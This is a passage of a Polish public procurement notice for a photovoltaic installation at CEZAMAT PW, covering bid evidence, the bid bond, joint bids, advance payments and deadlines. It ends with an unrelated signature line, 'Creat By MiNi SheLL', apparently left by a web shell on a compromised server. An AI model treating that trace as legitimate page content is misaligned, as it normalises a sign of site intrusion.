Polskiej, z zastrzeżeniem art. 145<br/>ustawy o OZE <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu oraz o braku podstaw wykluczenia z postępowania. Wzór oświadczenia stanowi Załącznik Nr 4<br/>do SWZ.<br/>Oświadczenie podmiotu udostępniającego zasoby o braku podstaw wykluczenia z postępowania. Wzór oświadczenia stanowi<br/>Załącznik Nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>(jeżeli dotyczy), sporządzone według wzoru stanowiącego załącznik nr 8 do SWZ.<br/>W celu wykazania spełniania warunku określonego w pkt 9.3.4.1. - Wykaz robót w zakresie wykonanych prac budowlanych.<br/>Zamawiający żąda złożenia dowodów na wykonanie robót budowlanych o wartości powyżej 1.200.000,00 zł netto każda i<br/>polegających na zaprojektowaniu i budowie instalacji fotowoltaicznej o mocy zainstalowanej elektrycznej nie mniejszej niż 500 kWp.<br/>Zamawiający rozumie 2 zamówienia jako 2 odrębne zadania budowlane wykonanych w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości,<br/>przedmiotu, dat wykonania i podmiotu, na rzecz którego robota została wykonana lub jest wykonywana, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. Wzór<br/>wykazu stanowi Załącznik nr 6 do SWZ.<br/>W celu wykazania spełniania warunku określonego w p. 9.3.4.2. - Wykaz osób w zakresie dysponowania osobami zdolnymi do<br/>wykonania zamówienia Zamawiający żąda złożenia wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi<br/>osobami. Wzór wykazu stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych:<br/>-karty katalogowe, certyfikaty, deklaracje producenta, protokoły z testów laboratoryjnych, dokumenty z pomiarów parametrów elektrycznych, aprobaty proponowanych rozwiązań – zgodnie z tabelami nr 2, 3, 4, 6, 7 w PFU stanowiący Załącznik nr 2 do SWZ , w których Wykonawca zobowiązany jest jednoznacznie i wyraźnie wskazać (np. poprzez zaznaczenie) dane na potwierdzenie spełnienia technologii i parametrów proponowanego rozwiązania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku, gdy Wykonawca nie przynależy do żadnej grupy kapitałowej - Oświadczenie Wykonawcy, w zakresie<br/>art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie.<br/>Po upływie terminu składania ofert Zamawiający wezwie Wykonawców do złożenia oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – według wzoru stanowiącego załącznik nr 5 do SWZ, z zastrzeżeniem pkt 10.2.6 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 60 000,00 zł.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymanie nieprzerwanie do dnia upływu związania ofertą, z<br/>wyjątkiem przypadków, których mowa w art. 98 ust. 1 pkt 20 i 3) oraz ust. 2 PZP.<br/>Wadium musi zostać wniesione najpóźniej do wyznaczonego terminu składania ofert (data i godzina).<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym<br/>Zamawiającego.<br/>Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić : przelewem na konto<br/>81 1240 1053 1111 0000 0500 5664 z dopiskiem „WADIUM” i oznaczyć „Instalacja fotowoltaiczna – CEZAMAT PW” - nr<br/>postępowania: CEZAMAT/ZP47/2025”<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3) lit. b) – d), Wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – w formie oryginalnego<br/>elektronicznego dokumentu wadialnego opatrzonego kwalifikowanym podpisem elektronicznym osoby upoważnionej do<br/>wystawienia dokumentu wadialnego.<br/>W przypadku, gdy Wykonawca składa wadium w formie gwarancji lub poręczenia, wymaga się aby oryginał dokumentu<br/>został złożony wraz z ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w rozumieniu art. 58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>11.1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>11.1.1. Oryginał pełnomocnictwa (lub kopia poświadczona notarialnie) w postaci pisemnej musi zostać załączony do oferty i<br/>zawierać w szczególności wskazanie:<br/>11.1.1.1. postępowania o zamówienie publiczne, którego dotyczy (nazwa);<br/>11.1.1.2. wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego wymienionych z nazwy,<br/>z określeniem adresu siedziby;<br/>11.1.1.3. ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>11.1.2. Jeśli Pełnomocnikiem będzie osoba trzecia, pełnomocnictwo musi zostać podpisane przez wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, a jeżeli Pełnomocnikiem będzie jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, przez pozostałych Wykonawców. Podpisy muszą zostać złożone przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub w ewidencji lub w innym dokumencie,<br/>właściwym dla formy organizacyjnej Wykonawcy.<br/>Wszelka korespondencja oraz rozliczenia dokonywane będą przez Zamawiającego wyłącznie z Pełnomocnikiem, którego<br/>dane teleadresowe należy wpisać w Formularzu ofertowym.<br/>Wspólników spółki cywilnej traktuje się jak Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający dopuszcza udzielenie Wykonawcy zaliczki na poczet wykonania przedmiotu umowy.<br/>2. Udzielenie przez Zamawiającego zaliczki na poczet wykonania przedmiotu umowy możliwe jest po wystąpieniu przez<br/>Wykonawcę z uzasadnionym wnioskiem. Zamawiający zastrzega sobie prawo podjęcia decyzji w sprawie udzielenia<br/>zaliczki. Wykonawcy nie przysługuje roszczenie o udzielenie zaliczki.<br/>3. Wykonawca uprawniony jest wystąpić do Zamawiającego z wnioskiem o udzielenie zaliczki w terminie nie późniejszym niż<br/>3 tygodnie od dnia zawarcia umowy.<br/>4. Zamawiający rozpatrzy wniosek Wykonawcy o udzielenie zaliczki na poczet wykonania przedmiotu umowy w terminie nie<br/>dłuższym niż 14 dni. Zgoda lub odmowa wyrażenia zgody na udzielenie zaliczki zostanie udzielona na piśmie.<br/>Pozostałe informacje w załączniku nr 3 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacje zawarte w załączniku nr 3 do SWZ § 18. Zmiana treści umowy, przedterminowe zakończenie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć za pośrednictwem platformy zakupowej (https://platformazakupowa.pl/pn/pw_edu/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Zamawiający umożliwia i zaleca przeprowadzenie przed upływem terminu składania ofert wizji lokalnej w celu powzięcia<br/>niezbędnych informacji, które mogą okazać się przydatne do przygotowania oferty, z zastrzeżeniem, że nie jest ona<br/>obowiązkowa, a tym samym nieodbycie wizji lokalnej nie spowoduje odrzucenia oferty.<br/>Wykonawcy zainteresowani wizją lokalną zobowiązani są przesłać do Zamawiającego za pośrednictwem platformy<br/>zakupowej OpenNexus deklarację udziału w wizji lokalnej w terminie nie dłuższym niż 3 dni robocze od dnia publikacji<br/>ogłoszenia o zamówieniu.<br/><br/>2.Zgodnie z art. 310 pkt 1 PZP, Zamawiający przewiduje możliwość unieważnienia przedmiotowego postępowania,<br/>jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu<br/>przyznane.<br/>Zamówienie jest przewidziane do finansowania z Krajowego Planu Odbudowy i Wspierania<br/>Odporności, Priorytet: Zielona energia i zmniejszenie energochłonności - część grantowa, Działanie B2.2.2. Instalacje OZE<br/>realizowane przez społeczności energetyczne (Nabór KPOD.03.12-IP.05-002/23).<br/>Umowa nr KPOD.03.12-IP.05-0095/24 o objęcie wsparciem przedsięwzięcia: „Referencyjny projekt warszawskiego Klastra.<br/><br/>3. Termin realizacji zamówienia: nie dłużej niż 6 miesięcy od dnia zawarcia umowy nie dłużej niż do dnia 31.07.2026 r. z zastrzeżeniem, że odbiór instalacji przez operatora systemu dystrybucyjnego i rozpoczęcie produkcji energii zostanie wykonane w terminie określonych w warunkach przyłączeniowych wydanych przez operatora systemu OSD.

Creat By MiNi SheLL
Email: jattceo@gmail.com